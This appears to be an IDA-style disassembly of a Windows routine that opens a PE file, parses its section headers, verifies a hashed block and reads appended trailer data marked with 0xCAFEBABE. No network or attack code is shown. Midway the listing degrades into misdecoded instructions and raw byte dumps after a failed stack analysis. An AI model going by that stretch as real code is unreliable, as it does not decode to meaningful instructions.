var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_C4 = byte ptr -0C4h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_A0 = byte ptr -0A0h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E420
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFCE0h
push ebx
push esi
push edi
mov [ebp+var_20], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_1C], ecx
mov [ebp+var_28], 0FFFFFFFFh
mov [ebp+var_24], 0
mov [ebp+var_4], 0
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+arg_0]
push eax
call ds:dword_5116A8 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_503690
mov ecx, 0EF000005h
call sub_508342
loc_503690: ; CODE XREF: sub_503610+74�j
push 0
mov ecx, [ebp+var_28]
push ecx
call ds:dword_511700 ; GetFileSize
mov [ebp+var_54], eax
mov [ebp+var_78], 0
mov edx, [ebp+arg_8]
and edx, 0FFh
test edx, edx
jz loc_50392F
mov eax, ds:dword_511684
mov ecx, [eax+24h]
and ecx, 2
test ecx, ecx
jnz loc_50392F
mov edx, ds:dword_511684
mov eax, [edx+4]
mov [ebp+var_88], eax
mov ecx, [ebp+var_88]
mov edx, [ebp+var_88]
add edx, [ecx+3Ch]
mov ds:dword_511910, edx
mov eax, ds:dword_511910
cmp dword ptr [eax], 4550h
jz short loc_503705
mov ecx, 0EF000002h
call sub_508342
loc_503705: ; CODE XREF: sub_503610+E9�j
mov ecx, ds:dword_511910
xor edx, edx
mov dx, [ecx+14h]
mov eax, ds:dword_511910
lea ecx, [eax+edx+18h]
mov [ebp+var_84], ecx
mov edx, ds:dword_511910
add edx, 98h
mov [ebp+var_7C], edx
mov [ebp+var_8C], 0
mov eax, ds:dword_511910
xor ecx, ecx
mov cx, [eax+6]
mov [ebp+var_80], ecx
jmp short loc_503752
; ---------------------------------------------------------------------------
loc_503749: ; CODE XREF: sub_503610:loc_503782�j
mov edx, [ebp+var_80]
sub edx, 1
mov [ebp+var_80], edx
loc_503752: ; CODE XREF: sub_503610+137�j
cmp [ebp+var_80], 0
jl loc_503893
mov eax, [ebp+var_80]
imul eax, 28h
mov ecx, [ebp+var_84]
cmp dword ptr [ecx+eax+10h], 0
jz short loc_503782
mov edx, [ebp+var_80]
imul edx, 28h
mov eax, [ebp+var_84]
cmp dword ptr [eax+edx+14h], 0
jnz short loc_503784
loc_503782: ; CODE XREF: sub_503610+15D�j
jmp short loc_503749
; ---------------------------------------------------------------------------
loc_503784: ; CODE XREF: sub_503610+170�j
mov ecx, [ebp+var_80]
imul ecx, 28h
mov edx, [ebp+var_80]
imul edx, 28h
mov eax, [ebp+var_84]
mov edx, [eax+edx+10h]
mov eax, ds:dword_511910
mov eax, [eax+3Ch]
lea edx, [edx+eax-1]
mov eax, ds:dword_511910
mov eax, [eax+3Ch]
sub eax, 1
not eax
and edx, eax
mov eax, [ebp+var_84]
mov ecx, [eax+ecx+14h]
add ecx, edx
mov [ebp+var_8C], ecx
push 0
push 0
mov edx, [ebp+var_8C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_511788 ; SetFilePointer
mov [ebp+var_B4], eax
push 0
lea ecx, [ebp+var_90]
push ecx
push 20h
lea edx, [ebp+var_B0]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_51177C ; ReadFile
test eax, eax
jz loc_503893
cmp [ebp+var_90], 20h
jnz loc_503893
lea ecx, [ebp+var_130]
call sub_507798
push 10h
lea ecx, [ebp+var_B0]
push ecx
lea ecx, [ebp+var_130]
call sub_5077A4
lea edx, [ebp+var_C4]
push edx
lea ecx, [ebp+var_130]
call sub_50785D
mov ecx, 4
lea edi, [ebp+var_A0]
lea esi, [ebp+var_C4]
xor eax, eax
repe cmpsd
jnz short loc_503893
mov ecx, [ebp+var_8C]
add ecx, [ebp+var_B0]
mov [ebp+var_78], ecx
push 2
push 0
push 0
mov edx, [ebp+var_28]
push edx
call ds:dword_511788 ; SetFilePointer
mov [ebp+var_134], eax
mov eax, [ebp+var_134]
sub eax, [ebp+var_78]
neg eax
mov [ebp+var_78], eax
jmp loc_50392F
; ---------------------------------------------------------------------------
loc_503893: ; CODE XREF: sub_503610+146�j
; sub_503610+1F0�j ...
mov ecx, [ebp+var_7C]
cmp dword ptr [ecx], 0
jz loc_50392F
mov edx, [ebp+var_7C]
cmp dword ptr [edx+4], 0
jz loc_50392F
mov eax, [ebp+var_7C]
mov ecx, [ebp+var_54]
sub ecx, [eax]
neg ecx
mov [ebp+var_78], ecx
mov edx, [ebp+var_7C]
mov eax, [edx]
mov [ebp+var_54], eax
mov [ebp+var_138], 0
loc_5038CB: ; CODE XREF: sub_503610+31D�j
push 2
push 0
mov ecx, [ebp+var_78]
sub ecx, 1
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_511788 ; SetFilePointer
mov [ebp+var_140], eax
push 0
lea eax, [ebp+var_13C]
push eax
push 1
lea ecx, [ebp+var_138]
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_51177C ; ReadFile
test eax, eax
jnz short loc_503910
mov ecx, 0EF000006h
call sub_508342
loc_503910: ; CODE XREF: sub_503610+2F4�j
cmp [ebp+var_138], 0
jz short loc_50391B
jmp short loc_50392F
; ---------------------------------------------------------------------------
loc_50391B: ; CODE XREF: sub_503610+307�j
mov eax, [ebp+var_78]
sub eax, 1
mov [ebp+var_78], eax
mov ecx, [ebp+var_54]
sub ecx, 1
mov [ebp+var_54], ecx
jmp short loc_5038CB
; ---------------------------------------------------------------------------
loc_50392F: ; CODE XREF: sub_503610+A1�j
; sub_503610+B4�j ...
push 2
push 0
mov edx, [ebp+var_78]
sub edx, 4
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_511788 ; SetFilePointer
mov [ebp+var_74], eax
mov ecx, [ebp+var_54]
add ecx, [ebp+var_78]
mov [ebp+var_54], ecx
mov [ebp+var_144], 0
push 0
lea edx, [ebp+var_144]
push edx
push 4
lea eax, [ebp+var_148]
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_51177C ; ReadFile
test eax, eax
jz short loc_503983
cmp [ebp+var_144], 4
jz short loc_50398D
loc_503983: ; CODE XREF: sub_503610+368�j
mov ecx, 0EF000006h
call sub_508342
loc_50398D: ; CODE XREF: sub_503610+371�j
cmp [ebp+var_148], 0CAFEBABEh
jz short loc_5039B0
mov edx, [ebp+var_148]
xor edx, 0CAFEBABEh
xor edx, [ebp+var_54]
mov [ebp+var_308], edx
jmp short loc_5039BB
; ---------------------------------------------------------------------------
loc_5039B0: ; CODE XREF: sub_503610+387�j
mov eax, ds:dword_510BD8
mov [ebp+var_308], eax
loc_5039BB: ; CODE XREF: sub_503610+39E�j
mov ecx, [ebp+var_308]
mov [ebp+var_14C], ecx
mov edx, [ebp+arg_4]
and edx, 0FFh
test edx, edx
jz short loc_5039EF
mov eax, offset dword_510BD8
lea ecx, [ebp+var_14C]
mov edx, [ecx]
cmp edx, [eax]
jz short loc_5039EF
mov ecx, 0EF000007h
call sub_508342
loc_5039EF: ; CODE XREF: sub_503610+3C2�j
; sub_503610+3D3�j
push 2
push 0
mov eax, [ebp+var_78]
sub eax, 14h
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_511788 ; SetFilePointer
mov [ebp+var_150], 0
push 0
lea edx, [ebp+var_150]
push edx
push 10h
lea eax, [ebp+var_4C]
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_51177C ; ReadFile
test eax, eax
jz short loc_503A34
cmp [ebp+var_150], 10h
jz short loc_503A3E
loc_503A34: ; CODE XREF: sub_503610+419�j
mov ecx, 0EF000006h
call sub_508342
loc_503A3E: ; CODE XREF: sub_503610+422�j
mov edx, [ebp+arg_8]
and edx, 0FFh
neg edx
sbb edx, edx
and edx, 0Ch
mov [ebp+var_68], edx
push 2
push 0
mov eax, [ebp+var_68]
add eax, 2Ch
mov ecx, [ebp+var_78]
sub ecx, eax
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_511788 ; SetFilePointer
mov [ebp+var_154], 0
mov eax, [ebp+arg_8]
and eax, 0FFh
test eax, eax
jz loc_503B15
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_34]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_51177C ; ReadFile
test eax, eax
jz short loc_503AAB
cmp [ebp+var_154], 4
jz short loc_503AB5
loc_503AAB: ; CODE XREF: sub_503610+490�j
mov ecx, 0EF000006h
call sub_508342
loc_503AB5: ; CODE XREF: sub_503610+499�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_50]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_51177C ; ReadFile
test eax, eax
jz short loc_503ADB
cmp [ebp+var_154], 4
jz short loc_503AE5
loc_503ADB: ; CODE XREF: sub_503610+4C0�j
mov ecx, 0EF000006h
call sub_508342
loc_503AE5: ; CODE XREF: sub_503610+4C9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_38]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_51177C ; ReadFile
test eax, eax
jz short loc_503B0B
cmp [ebp+var_154], 4
jz short loc_503B15
loc_503B0B: ; CODE XREF: sub_503610+4F0�j
mov ecx, 0EF000006h
call sub_508342
loc_503B15: ; CODE XREF: sub_503610+46F�j
; sub_503610+4F9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_60]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_51177C ; ReadFile
test eax, eax
jz short loc_503B3B
cmp [ebp+var_154], 4
jz short loc_503B45
loc_503B3B: ; CODE XREF: sub_503610+520�j
mov ecx, 0EF000006h
call sub_508342
loc_503B45: ; CODE XREF: sub_503610+529�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_70]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_51177C ; ReadFile
test eax, eax
jz short loc_503B6B
cmp [ebp+var_154], 4
jz short loc_503B75
loc_503B6B: ; CODE XREF: sub_503610+550�j
mov ecx, 0EF000006h
call sub_508342
loc_503B75: ; CODE XREF: sub_503610+559�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_3C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_51177C ; ReadFile
test eax, eax
jz short loc_503B9B
cmp [ebp+var_154], 4
jz short loc_503BA5
loc_503B9B: ; CODE XREF: sub_503610+580�j
mov ecx, 0EF000006h
call sub_508342
loc_503BA5: ; CODE XREF: sub_503610+589�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_64]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_51177C ; ReadFile
test eax, eax
jz short loc_503BCB
cmp [ebp+var_154], 4
jz short loc_503BD5
loc_503BCB: ; CODE XREF: sub_503610+5B0�j
mov ecx, 0EF000006h
call sub_508342
loc_503BD5: ; CODE XREF: sub_503610+5B9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_6C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_51177C ; ReadFile
test eax, eax
jz short loc_503BFB
cmp [ebp+var_154], 4
jz short loc_503C05
loc_503BFB: ; CODE XREF: sub_503610+5E0�j
mov ecx, 0EF000006h
call sub_508342
loc_503C05: ; CODE XREF: sub_503610+5E9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_58]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_51177C ; ReadFile
test eax, eax
jz short loc_503C2B
cmp [ebp+var_154], 4
jz short loc_503C35
loc_503C2B: ; CODE XREF: sub_503610+610�j
mov ecx, 0EF000006h
call sub_508342
loc_503C35: ; CODE XREF: sub_503610+619�j
mov ecx, [ebp+arg_8]
and ecx, 0FFh
test ecx, ecx
jz loc_503E52
cmp [ebp+var_50], 0
jz loc_503E52
cmp [ebp+var_34], 0
jz loc_503E52
push 24h
call sub_50835A
add esp, 4
mov [ebp+var_2D8], eax
mov edx, [ebp+var_2D8]
mov [ebp+var_158], edx
mov eax, [ebp+var_1C]
add eax, 1
push eax
call sub_50835A
add esp, 4
mov [ebp+var_2DC], eax
mov ecx, [ebp+var_158]
mov edx, [ebp+var_2DC]
mov [ecx+0Ch], edx
mov ecx, [ebp+var_1C]
add ecx, 1
mov esi, [ebp+arg_0]
mov eax, [ebp+var_158]
mov edi, [eax+0Ch]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+var_158]
mov dword ptr [eax], 0
push 10h
call sub_50835A
add esp, 4
mov [ebp+var_2E0], eax
mov ecx, [ebp+var_158]
mov edx, [ebp+var_2E0]
mov [ecx+4], edx
push 4
call sub_50835A
add esp, 4
mov [ebp+var_2E4], eax
mov eax, [ebp+var_158]
mov ecx, [ebp+var_2E4]
mov [eax+8], ecx
mov edx, [ebp+var_158]
mov dword ptr [edx+18h], 1
mov eax, [ebp+var_158]
mov dword ptr [eax+14h], 0
push 0
push 0
mov ecx, [ebp+var_158]
add ecx, 1Ch
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_511704 ; GetFileTime
mov edi, ds:dword_51190C
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov eax, ds:dword_511908
sub ecx, [eax+0C14h]
mov [ebp+var_15C], ecx
mov ecx, [ebp+var_15C]
add ecx, 1
push ecx
call sub_50835A
add esp, 4
mov [ebp+var_2E8], eax
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_2E8]
mov [eax], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_158]
mov edx, [ecx+8]
mov eax, [eax]
mov [edx], eax
mov ecx, [ebp+var_15C]
add ecx, 1
mov edx, ds:dword_511908
mov esi, ds:dword_51190C
add esi, [edx+0C14h]
mov eax, [ebp+var_158]
mov edx, [eax+8]
mov edi, [edx]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_15C]
push ecx
mov edx, [ebp+var_158]
mov eax, [edx+8]
mov ecx, [eax]
push ecx
call ds:dword_5117C8 ; CharUpperBuffA
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_34]
mov [eax+4], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_50]
mov [eax+8], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_38]
mov [eax+0Ch], ecx
mov edx, ds:dword_511908
mov [ebp+var_160], edx
mov eax, [ebp+var_158]
mov ecx, [ebp+var_160]
mov edx, [ecx]
mov [eax+10h], edx
mov eax, [ebp+var_160]
mov ecx, [ebp+var_158]
mov [eax], ecx
mov edx, ds:dword_511908
mov eax, [edx+4]
add eax, 1
mov ecx, ds:dword_511908
mov [ecx+4], eax
loc_503E52: ; CODE XREF: sub_503610+630�j
; sub_503610+63A�j ...
mov edx, [ebp+var_54]
sub edx, [ebp+var_58]
mov [ebp+var_58], edx
mov eax, [ebp+var_3C]
add eax, [ebp+var_58]
mov [ebp+var_3C], eax
mov ecx, [ebp+var_54]
sub ecx, [ebp+var_3C]
test ecx, ecx
jb short loc_503E79
mov edx, [ebp+var_54]
sub edx, [ebp+var_3C]
cmp [ebp+var_60], edx
jbe short loc_503E83
loc_503E79: ; CODE XREF: sub_503610+85C�j
mov ecx, 0EF000007h
call sub_508342
loc_503E83: ; CODE XREF: sub_503610+867�j
mov eax, [ebp+var_60]
push eax
call sub_50835A
add esp, 4
mov [ebp+var_2EC], eax
mov ecx, [ebp+var_2EC]
mov [ebp+var_24], ecx
mov [ebp+var_234], 0
mov [ebp+var_238], 0
push 0
push 0
mov edx, [ebp+var_3C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_511788 ; SetFilePointer
loc_503EC4: ; CODE XREF: sub_503610+90A�j
mov ecx, [ebp+var_238]
cmp ecx, [ebp+var_60]
jz short loc_503F1C
mov [ebp+var_234], 0
push 0
lea edx, [ebp+var_234]
push edx
mov eax, [ebp+var_60]
sub eax, [ebp+var_238]
push eax
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_51177C ; ReadFile
test eax, eax
jnz short loc_503F08
mov ecx, 0EF000006h
call sub_508342
loc_503F08: ; CODE XREF: sub_503610+8EC�j
mov eax, [ebp+var_238]
add eax, [ebp+var_234]
mov [ebp+var_238], eax
jmp short loc_503EC4
; ---------------------------------------------------------------------------
loc_503F1C: ; CODE XREF: sub_503610+8BD�j
push 120000h
call near ptr loc_4FDB7D+1
fxch4 st(2)
push esp
mov ebp, 46EE4704h
fst st
iret
sub_503610 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0F5h, 0E9h, 1Eh
dd 0D5E28C45h, 8C62D4A7h, 7CF0AAEEh, 97AF283Eh, 0D6A56BD3h
dd 7F01D584h, 9F85C5B6h, 0E7618390h, 0A2424F41h, 0FED9E4FEh
dd 0CDB905E3h, 55C9DCC0h, 0EF5F05A1h, 6E843F49h, 52F6001Ah
dd 67F55184h, 978DDDCEh, 1D797B88h, 0BA3A4746h, 6F9ECF7h
dd 0C5B6D5FBh, 339090B8h, 75D285D2h, 4C8D8DEEh, 0E8FFFFFDh
dd 37FCh, 50A0458Bh, 51DC4D8Bh, 0FD4C8D8Dh, 0F5E8FFFFh
dd 8D000037h, 0FFFDB895h, 8D8D52FFh, 0FFFFFD4Ch, 389CE8h
dd 4B900h, 0BD8D0000h, 0FFFFFDB8h, 33B4758Dh, 74A7F3C0h
dd 7B90Ah, 63E8EF00h, 6A000043h, 4374E824h, 0C4830000h
dd 10858904h, 8BFFFFFDh, 0FFFD108Dh, 0E04D89FFh, 83E4558Bh
dd 0E85201C2h, 4356h, 8904C483h, 0FFFD0C85h, 0E0458BFFh
dd 0FD0C8D8Bh, 4889FFFFh, 0E44D8B0Ch, 8B01C183h, 558B0875h
dd 0C7A8BE0h, 0E9C1C18Bh, 8BA5F302h, 3E183C8h, 4D8BA4F3h
dd 0DC558BE0h, 458B1189h, 9C4503DCh, 89E04D8Bh, 558B0441h
dd 2E2C194h, 4304E852h, 0C4830000h, 8858904h, 8BFFFFFDh
dd 8D8BE045h, 0FFFFFD08h, 8B084889h, 458BE055h, 18428994h
dd 0C7E04D8Bh, 1441h, 558D0000h, 458D52D0h, 4D8B50D0h
dd 1CC183E0h, 0D8558B51h, 415FF52h, 8B005117h, 7883E045h
dd 16750020h, 83E04D8Bh, 75001C79h, 0E0558B0Dh, 521CC283h
dd 172C15FFh, 45C70051h, 0A4h, 8B09EB00h, 0C083A445h, 0A4458901h
dd 3BA44D8Bh, 830F944Dh, 0E3h, 0C1A4558Bh, 458B04E2h, 4488BE0h
dd 3DC458Bh, 4D8B1104h, 4E1C1A4h, 8BE0558Bh, 4890452h
dd 0A4458B0Ah, 8B04E0C1h, 518BE04Dh, 23C8B04h, 33FFC983h
dd 0F7AEF2C0h, 0FFC183D1h, 0FD488D89h, 858BFFFFh, 0FFFFFD48h
dd 5001C083h, 4235E8h, 4C48300h, 0FD048589h, 4D8BFFFFh
dd 8518BE0h, 8BA4458Bh, 0FFFD048Dh, 820C89FFh, 0FD488D8Bh
dd 0C183FFFFh, 0A4558B01h, 8B04E2C1h, 408BE045h, 10348B04h
dd 8BE0558Bh, 558B0842h, 903C8BA4h, 0E9C1C18Bh, 8BA5F302h
dd 3E183C8h, 8D8BA4F3h, 0FFFFFD48h, 0A4558B51h, 8B04E2C1h
dd 488BE045h, 11148B04h, 0C815FF52h, 8B005117h, 0E0C1A445h
dd 0E04D8B04h, 8B04518Bh, 3040244h, 4D8BA845h, 4E1C1A4h
dd 8BE0558Bh, 44890452h, 8E9040Ah, 8BFFFFFFh, 4503DC45h
dd 0FC7881A0h, 0FEFEFEFEh, 0A7850Fh, 4D8B0000h, 0A04D03DCh
dd 89F8518Bh, 0FFFD3C95h, 0DC458BFFh, 8BA04503h, 8D89F448h
dd 0FFFFFD40h, 3DC558Bh, 0FFFD4095h, 449589FFh, 0C7FFFFFDh
dd 0FFFD3885h, 0FFh, 8B0FEB00h, 0FFFD3885h, 1C083FFh, 0FD388589h
dd 8D8BFFFFh, 0FFFFFD38h, 0FD3C8D3Bh, 3A73FFFFh, 0FD38958Bh
dd 0D26BFFFFh, 44858B18h, 3FFFFFDh, 348589C2h, 8BFFFFFDh
dd 0FFFD348Dh, 0DC558BFFh, 8B105103h, 0FFFD3485h, 105089FFh
dd 0FD348D8Bh, 8D89FFFFh, 0FFFFFD30h, 958BA9EBh, 0FFFFFD44h
dd 18F01589h, 858B0051h, 0FFFFFD3Ch, 5118F4A3h, 80D8B00h
dd 89005119h, 0FFFD2C8Dh, 2C958BFFh, 83FFFFFDh, 840F003Ah
dd 152h, 8908458Bh, 0FFFCF485h, 2C8D8BFFh, 8BFFFFFDh, 0C428B11h
dd 0FCF08589h, 8D8BFFFFh, 0FFFFFCF0h, 9588118Ah, 0FFFFFCEFh
dd 0FCF4858Bh, 103AFFFFh, 0BD804675h, 0FFFFFCEFh, 8B317400h
dd 0FFFCF08Dh, 1518AFFh, 0FCEE9588h, 858BFFFFh, 0FFFFFCF4h
dd 7501503Ah, 0F0858323h, 2FFFFFCh, 0FCF48583h, 8002FFFFh
dd 0FFFCEEBDh, 0AE7500FFh, 0FCE885C7h, 0FFFFh, 0BEB0000h
dd 0D983C91Bh, 0E88D89FFh, 8BFFFFFCh, 0FFFCE895h, 0E49589FFh
dd 83FFFFFCh, 0FFFCE4BDh, 57D00FFh, 0B5E9h, 1908A100h
dd 0C0830051h, 0E0858910h, 8BFFFFFCh, 0FFFD2C8Dh, 8B118BFFh
db 42h
byte_504341 db 0Ch, 89h, 85h ; DATA XREF: _1:off_43DECC�o
dd 0FFFFFCDCh, 0FCDC8D8Bh
db 2 dup(0FFh), 8Ah
byte_50434F db 11h ; DATA XREF: _1:off_43DEC8�o
dd 0FCDB9588h, 858BFFFFh, 0FFFFFCE0h, 4675103Ah, 0FCDBBD80h
dd 7400FFFFh, 0DC8D8B31h, 8AFFFFFCh, 95880151h, 0FFFFFCDAh
dd 0FCE0858Bh, 503AFFFFh, 83237501h, 0FFFCDC85h, 858302FFh
dd 0FFFFFCE0h, 0DABD8002h, 0FFFFFCh, 85C7AE75h, 0FFFFFCD4h
dd 0
; ---------------------------------------------------------------------------
jmp short loc_5043B1
; ---------------------------------------------------------------------------
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
mov [ebp-32Ch], ecx
loc_5043B1: ; CODE XREF: _5:005043A4�j
mov edx, [ebp-32Ch]
mov [ebp-330h], edx
cmp dword ptr [ebp-330h], 0
jnz short loc_5043C8
jmp short loc_5043DE
; ---------------------------------------------------------------------------
loc_5043C8: ; CODE XREF: _5:005043C4�j
mov eax, [ebp-2D4h]
mov ecx, [eax]
add ecx, 10h
mov [ebp-2D4h], ecx
jmp near ptr dword_503F34+349h
; ---------------------------------------------------------------------------
loc_5043DE: ; CODE XREF: _5:005043C6�j
mov edx, [ebp-20h]
mov eax, [ebp-2D4h]
mov ecx, [eax]
mov [edx+10h], ecx
mov edx, [ebp-2D4h]
mov eax, [ebp-20h]
mov [edx], eax
mov ecx, ds:dword_511908
mov edx, [ecx+4]
add edx, [ebp-6Ch]
mov eax, ds:dword_511908
mov [eax+4], edx
mov dword ptr [ebp-24h], 0
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_504427
jmp short loc_504474
; =============== S U B R O U T I N E =======================================
sub_504427 proc near ; CODE XREF: _5:00504420�p
; DATA XREF: _6:0050E428�o
cmp dword ptr [ebp-28h], 0FFFFFFFFh
jz short loc_504437
mov ecx, [ebp-28h]
push ecx
call ds:dword_5116A4 ; CloseHandle
loc_504437: ; CODE XREF: sub_504427+4�j
cmp dword ptr [ebp-24h], 0
jz short loc_504455
mov edx, [ebp-24h]
mov [ebp-300h], edx
mov eax, [ebp-300h]
push eax
call sub_5083DD
add esp, 4
loc_504455: ; CODE XREF: sub_504427+14�j
cmp dword ptr [ebp-20h], 0
jz short locret_504473
mov ecx, [ebp-20h]
mov [ebp-304h], ecx
mov edx, [ebp-304h]
push edx
call sub_5083DD
add esp, 4
locret_504473: ; CODE XREF: sub_504427+32�j
retn
sub_504427 endp
; ---------------------------------------------------------------------------
loc_504474: ; CODE XREF: _5:00504425�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_504490 proc near ; CODE XREF: sub_502DD0+623�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 005046B5 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E430
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFB8h
push ebx
push esi
push edi
mov [ebp+var_1C], 0
mov [ebp+var_4], 0
mov eax, ds:dword_511908
mov dword ptr [eax+0Ch], 0
mov ecx, ds:dword_511908
mov edx, [ecx+4]
shl edx, 4
push edx
call sub_50835A
add esp, 4
mov [ebp+var_40], eax
mov eax, [ebp+var_40]
mov [ebp+var_1C], eax
loc_5044EB: ; CODE XREF: sub_504490+1E7�j
mov [ebp+var_34], 0
mov [ebp+var_28], 0
mov [ebp+var_30], 0
mov ecx, ds:dword_511908
mov edx, [ecx]
mov [ebp+var_20], edx
jmp short loc_504516
; ---------------------------------------------------------------------------
loc_50450D: ; CODE XREF: sub_504490+9E�j
; sub_504490+132�j ...
mov eax, [ebp+var_20]
mov ecx, [eax+10h]
mov [ebp+var_20], ecx
loc_504516: ; CODE XREF: sub_504490+7B�j
cmp [ebp+var_20], 0
jz loc_5045F9
mov edx, [ebp+var_20]
mov eax, [ebp+var_20]
mov ecx, [edx+14h]
cmp ecx, [eax+18h]
jnz short loc_504530
jmp short loc_50450D
; ---------------------------------------------------------------------------
loc_504530: ; CODE XREF: sub_504490+9C�j
cmp [ebp+var_30], 0
jz loc_5045D2
mov edx, [ebp+var_20]
mov eax, [edx+14h]
shl eax, 4
mov ecx, [ebp+var_20]
mov edx, [ecx+4]
add edx, eax
mov [ebp+var_38], edx
mov eax, [ebp+var_30]
mov [ebp+var_48], eax
mov ecx, [ebp+var_38]
mov edx, [ecx]
mov [ebp+var_4C], edx
loc_50455C: ; CODE XREF: sub_504490+FE�j
mov eax, [ebp+var_4C]
mov cl, [eax]
mov [ebp+var_4D], cl
mov edx, [ebp+var_48]
cmp cl, [edx]
jnz short loc_504599
cmp [ebp+var_4D], 0
jz short loc_504590
mov eax, [ebp+var_4C]
mov cl, [eax+1]
mov [ebp+var_4E], cl
mov edx, [ebp+var_48]
cmp cl, [edx+1]
jnz short loc_504599
add [ebp+var_4C], 2
add [ebp+var_48], 2
cmp [ebp+var_4E], 0
jnz short loc_50455C
loc_504590: ; CODE XREF: sub_504490+DF�j
mov [ebp+var_54], 0
jmp short loc_5045A1
; ---------------------------------------------------------------------------
loc_504599: ; CODE XREF: sub_504490+D9�j
; sub_504490+F0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_54], eax
loc_5045A1: ; CODE XREF: sub_504490+107�j
mov ecx, [ebp+var_54]
mov [ebp+var_58], ecx
mov edx, [ebp+var_58]
mov [ebp+var_3C], edx
cmp [ebp+var_3C], 0
jnz short loc_5045C7
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
add ecx, 1
mov edx, [ebp+var_20]
mov [edx+14h], ecx
jmp loc_50450D
; ---------------------------------------------------------------------------
loc_5045C7: ; CODE XREF: sub_504490+121�j
cmp [ebp+var_3C], 0
jle short loc_5045D2
jmp loc_50450D
; ---------------------------------------------------------------------------
loc_5045D2: ; CODE XREF: sub_504490+A4�j
; sub_504490+13B�j
